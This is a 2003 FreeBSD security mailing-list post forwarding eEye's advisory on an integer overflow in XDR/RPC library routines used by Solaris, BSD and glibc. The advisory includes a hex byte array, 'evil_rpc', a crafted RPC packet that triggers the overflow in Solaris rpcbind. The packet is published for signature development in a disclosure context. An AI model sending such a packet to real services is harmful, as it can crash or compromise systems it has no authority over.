From owner-freebsd-security Wed Mar 19 12:50:23 2003 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 5854D37B404 for ; Wed, 19 Mar 2003 12:50:18 -0800 (PST) Received: from lava.sentex.ca (pyroxene.sentex.ca [199.212.134.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2E79743FBF for ; Wed, 19 Mar 2003 12:50:17 -0800 (PST) (envelope-from mike@sentex.net) Received: from simian.sentex.net (simeon.sentex.ca [192.168.43.27]) by lava.sentex.ca (8.12.8/8.12.8) with ESMTP id h2JKoErj024026 for ; Wed, 19 Mar 2003 15:50:14 -0500 (EST) (envelope-from mike@sentex.net) Message-Id: <5.2.0.9.0.20030319155420.080cbab8@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Wed, 19 Mar 2003 15:54:49 -0500 To: security@freebsd.org From: Mike Tancsa Subject: Fwd: EEYE: XDR Integer Overflow Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: By Sentex Communications (lava/20020517) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Anyone know if this effects FreeBSD ? There is no mention in the CERT advisory. ---Mike >Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm >List-Id: >List-Post: >List-Help: >List-Unsubscribe: >List-Subscribe: >Delivered-To: mailing list bugtraq@securityfocus.com >Delivered-To: moderator for bugtraq@securityfocus.com >From: "Marc Maiffret" >To: "BUGTRAQ" >Subject: EEYE: XDR Integer Overflow >Date: Wed, 19 Mar 2003 12:20:14 -0800 >X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) >Importance: Normal >X-Spam-Status: No, hits=0.6 required=7.0 > tests=DISCLAIMER,KNOWN_MAILING_LIST,SPAM_PHRASE_01_02, > TO_LOCALPART_EQ_REAL,USER_AGENT_OUTLOOK > version=2.43 >X-Virus-Scanned: by Sentex Communications (avscan1/20021227) > >XDR Integer Overflow > >Release Date: >March 19, 2003 > >Severity: >High (Remote Code Execution/Denial of Service) > >Systems Affected: > >Sun Microsystems Network Services Library (libnsl) >BSD-derived libraries with XDR/RPC routines (libc) >GNU C library with sunrpc (glibc) > >Description: > >XDR is a standard for the description and encoding of data which is used >heavily in RPC implementations. Several libraries exist that allow a >developer to incorporate XDR into his or her applications. Vulnerabilities >were discovered in these libraries during the testing of new Retina auditing >technologies developed by the eEye research department. > >ADAM and EVE are two technologies developed by eEye to remotely and locally >audit applications for the existence of common vulnerabilities. During an >ADAM audit, an integer overflow was discovered in the SUN Microsystems XDR >library. By supplying specific integer values in length fields during an RPC >transaction, we were able to produce various overflow conditions in UNIX RPC >services. > >Technical Description: > >The xdrmem_getbytes() function in the XDR library provided by Sun >Microsystems contains an integer overflow. Depending on the location and use >of the vulnerable xdrmem_getbytes() routine, various conditions may be >presented that can permit an attacker to remotely exploit a service using >this vulnerable routine. > >For the purpose of signature development and further security research a >sample session is included below that replicates an integer overflow in the >rpcbind shipped with various versions of the Solaris operating system. > >char evil_rpc[] = > >"\x23\x0D\xF6\xD2\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86" >"\xA0\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00" >"\x00\x20\x3D\xD2\xC9\x9F\x00\x00\x00\x09\x6C\x6F\x63\x61\x6C" >"\x68\x6F\x73\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" >"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x86" >"\xa0\x00\x00\x00\x02\x00\x00\x00\x04" >"\xFF\xFF\xFF\xFF" // RPC argument length >"EEYECLIPSE2003"; > >Vendor Status: > >Sun Microsystems was contacted on November 13, 2002 and CERT was contacted >shortly afterwards. Vendors believed to be vulnerable were contacted by CERT >during a grace period of several months. Due to some difficulties >communicating with vendors, after rescheduling several times a release date >was set for March 18, 2003. > >eEye recommends obtaining the necessary patches or updates from vendors as >they become available after the release of this and the CERT advisory. > >For a list of vendors and their responses, please review the CERT advisory >at: http://www.cert.org/advisories/CA-2003-10.html > >You can find the latest copy of this advisory, along with other eEye >research at http://www.eeye.com/. > >Credit: >Riley Hassell - Senior Research Associate > >Greetings: >Liver destroyers of the world: >Barnes (DOW!), FX, and last but definitely not least, Heather and Jenn. > >Copyright (c) 1998-2003 eEye Digital Security >Permission is hereby granted for the redistribution of this alert >electronically. It is not to be edited in any way without express consent of >eEye. If you wish to reprint the whole or any part of this alert in any >other medium excluding electronic medium, please e-mail alert@eEye.com for >permission. > >Disclaimer >The information within this paper may change without notice. Use of this >information constitutes acceptance for use in an AS IS condition. There are >NO warranties with regard to this information. In no event shall the author >be liable for any damages whatsoever arising out of or in connection with >the use or spread of this information. Any use of this information is at the >user's own risk. > >Feedback >Please send suggestions, updates, and comments to: > >eEye Digital Security >http://www.eEye.com >info@eEye.com -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message